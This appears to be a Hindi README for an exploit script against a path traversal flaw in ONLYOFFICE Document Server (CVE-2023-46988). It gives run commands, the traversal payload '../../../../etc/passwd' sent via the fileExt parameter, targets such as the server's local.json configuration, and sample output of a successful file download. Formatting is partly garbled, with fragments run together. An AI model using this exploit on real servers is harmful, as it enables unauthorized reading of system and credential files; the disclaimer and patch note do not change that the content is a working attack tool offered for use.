
CVE-2023-46988: ONLYOFFICE पाथ ट्रैवर्सल एक्सप्लॉइट
यह स्क्रिप्ट ONLYOFFICE Document Server (CVE-2023-46988) में एक पथ ट्रैवर्सल भेद्यता का शोषण करती है जो अनधिकृत उपयोगकर्ताओं को सर्वर से मनमानी फ़ाइलों की प्रतिलिपि बनाने की अनुमति देती है। यह भेद्यता /example/editor एंडपॉइंट में मौजूद है, जहाँ fileExt पैरामीटर में हेरफेर करके संवेदनशील सिस्टम और कॉन्फ़िगरेशन फ़ाइलों तक पहुँचा जा सकता है।
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।
स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है।
/etc/passwd/etc/onlyoffice/documentserver/local.json (इसमें शामिल हैं)--file तर्क के साथ प्राप्त करने के लिए कोई भी फ़ाइल पथ निर्दिष्ट करें।--proxy)।--verify)।python onlyoffice_exploit.py http://localhost
यह प्राप्त करता है:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080 पर Burp Suite)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
fileExt पैरामीटर के साथ /example/editor पर एक अनुरोध भेजता है:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<extracted_filename> से फ़ाइल डाउनलोड करता है।[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
ONLYOFFICE ने अपने फरवरी 2024 अपडेट में इस भेद्यता को ठीक कर दिया है।
उपयोगकर्ताओं को अपने सर्वरों की सुरक्षा के लिए नवीनतम संस्करण में अपडेट करना चाहिए।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।